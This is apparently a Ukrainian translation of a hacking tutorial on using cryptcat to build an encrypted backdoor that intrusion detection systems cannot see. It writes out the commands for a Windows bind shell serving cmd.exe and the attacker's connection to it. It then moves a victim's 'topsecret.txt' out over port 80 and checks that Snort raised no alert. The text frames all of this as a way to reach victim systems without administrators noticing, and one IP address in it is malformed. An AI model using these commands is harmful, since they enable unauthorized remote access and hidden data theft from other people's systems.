Як створити Backdoor з Cryptcat, який майже неможливо виявити
User Rating: / 7
PoorBest 
There are no translations available.

CryptcatCryptcat дозволяє нам спілкуватися між двома системами і шифрує зв'язок між ними за допомогою twofish - одного з багатьох прекрасних алгоритмів шифрування.
Раніше ми познайомились з одним маленьким інструментом netcat, який дозволяє створити з'єднання між будь-якими двома машинами і передавати файли або створити командну оболонку для "оволодіння" системою. Незважаючи на красу і елегантність цього маленького інструменту, він має один головний недолік - передавання між комп'ютерами можуть бути виявлені такими пристроями безпеки, як брандмауери та системи виявлення вторгнень (IDS).
У цьому уроці познайомимося з популярним кузеном netcat, cryptcat (він насправді набагато симпатичніший і більш екзотичний, ніж простий netcat).
Оскільки шифрування twofish знаходиться на одному рівні з шифруванням AES, то це робить cryptcat практично куленепробивним. Таким чином, IDS не можуть виявити шкідливу поведінку навіть тоді, коли його маршрути пролягають через такі звичайні HTTP-порти, як 80 і 443.
Крок 1: Завантажте Cryptcat
Ви можете завантажити та встановити cryptcat на системі Windows за цим посиланням.
Крок 2: Відкрийте слухача на системі Windows
Ми можемо відкрити слухача на будь-якій системі з подібним синтаксисом, як для netcat. У нашому випадку, ми відкриваємо слухача в системі Windows 7 на порту 6996 і створюємо командну оболонку.
cryptcat -l -p 6996 -e cmd.еxe
Cryptcat-1
-l означає "відкрити слухача"
-p 6996 означає "розмістити слухача в порту 6996"
-e cmd.еxe означає "запустити командну оболонку для зв'язку"
Крок 3: Відкрийте Snort або іншу IDS
Тепер, давайте запустимо IDS типу Snort на іншій системі, яка буде підключатися до системи Windows, щоб побачити, чи здатне шифрування "засліпити" IDS, залишаючи наш чорний хід невидимим для подібних пристроїв безпеки.
Cryptcat-2
Крок 4: Підключіться до системи Windows з Cryptcat
Cryptcat встановлений за умовчанням на BackTrack, тому ми не повинні завантажувати і встановлювати його. Крім того, він знаходиться в директорії /bin, тому можемо отримати доступ до нього з будь-якого каталогу.
Тепер підключимося до системи Windows 7 з cryptcat з нашої системи BackTrack і подивимося, чи можемо виконати зашифроване з'єднання бекдор, яке майже неможливо виявити.
cryptcat 192.168.4.182.248 6996
Cryptcat-3
Як Ви можете бачити, ми підключені до системи Windows 7 і отримали командну оболонку з системи Win 7! Це дає нам значний контроль над даною системою, але не тотальний контроль, бо командна оболонка має обмежені можливості.
Крок 5: Перевірте журнали Snort та оповіщення
Цей тип атаки (проходження командної оболонки череж мережу) легко виявляється за допомогою Snort або інших IDS, коли з'єднання не шифрується. Правила Snort попередять сисадміна, що cmd.еxe оболонка проходить мережеве з'єднання, і вони, ймовірно, зроблять щось, щоб утримати Вас від використання цієї командної оболонки. З зашифрованим з'єднанням, доступним з cryptcat, цей зв'язок майже неможливо виявити.
Давайте повернемося назад і перевіримо журнали та оповіщення в Snort. Якщо ми були успішними в ухилянні від IDS, то не повинні побачити попередження щодо командної оболонки переміщення по мережі. Ми можемо перевірити наші журнали, зайшовши в /var/snort/alerts і подивитися чи є які-небудь сигнали, викликані нашим зв'язком до машини Windows (зазвичай, ми повинні знайти попередження).
kwritе /var/snort/alerts
Cryptcat-4
Як Ви можете бачити, ми домоглися успіху. Ми змогли підключитися до системи Windows, не привертаючи уваги будь-якої з систем безпеки!
Крок 6: Надішліть Crypcat через порт 80, щоб ухилитися від брандмауера
Хоча ми успішно створили зашифрований бекдор на системі жертви, пильний адміністратор з безпеки помітить, що відкритий незвичайний порт (6996). Це, швидше за все, ініціюватиме яку-небудь дію адміністратора з безпеки, щоб обмежити наш доступ. Крім того, в системах з хорошим системним адміністратором і хорошим брандмауером, цей порт, ймовірно, буде заблокований брандмауером.
Для будь-якої мережі, щоб мати можливість спілкуватися в Інтернеті, швидше за все, потрібно тримати відкриті порти 80 і 443, але також, можливо, 25, 53 і 110. Оскільки в незашифрованому вигляді нормальний інтернет-трафік проходить через порт 80, який майже завжди відкритий, то незначне збільшення трафіку навряд чи буде помічене.
Тепер, коли ми успішно використовували cryptcat, надішлемо його через порт 80 з усім іншим інтернет-трафіком. Хоча він зашифрований, але буде виглядати як і будь-які двійкові дані, що передаються в лінії. Тому буде майже неможливим для виявлення пристроями безпеки, щоб блокувати його, так як вони завжди повинні дозволяти трафік через порт 80, а трафік шифрується і IDS не зможе "бачити" його вміст.
Тут ми перемістимо файл з системи жертви з назвою topsecret.txt до нашої атакуючої системи без  виявлення його будь-яким пристроєм безпеки. На цей раз, замість відправки командної оболонки мережею, ми будемо посилати абсолютно секретний файл з ім'ям topsecret.txt через наше зашифроване з'єднання. Ми можемо зробити це, набравши в командному рядку на Windows:
cryptcat -l -p 80 < topsecret.txt
Cryptcat-5
    -l означає «відкрити слухача"
    -p 80 означає "відкрити цей слухач на порту 80"
    < означає "відправити файл через цей слухач"
Крок 7: Підключіться до слухача
Тепер давайте підключимося до системи жертви і витягнемо надсекретний файл. Все, що потрібно зробити, це підключитися до слухача, набравши cryptcat, IP-адресу системи жертви і номер порту слухача.
cryptcat 192.168.182.248 80
Cryptcat-6
Як Ви можете бачити, файл пройшов через наш зв'язок успішно!
Крок 8 : Перевірте файл оповіщень
Давайте ще раз перевіримо наші файли журналів Snort для доказів, що наш IDS не виявив цей трафік надсекретного файлу.
kwrite /var/snort/alerts
Cryptcat-7
Як Ви можете бачити, наш надсекретний файл перемістився через порт 80 під носом у системних адміністраторів, IDS і брандмауера без сліду!
Cryptcat - це відмінний маленький інструмент для переміщення даних за межі системи жертви через нормально відкриті порти без його виявлення будь-якими пристроями безпеки.
(Джерело EN: null-byte.wonderhowto.com)
 
>
BookNewsPractice SearchPartnersAbout
Підтримка та дизайн: Могильний С.С. Шаблон: Joomla Templates by BuyHTTP Joomla Hosting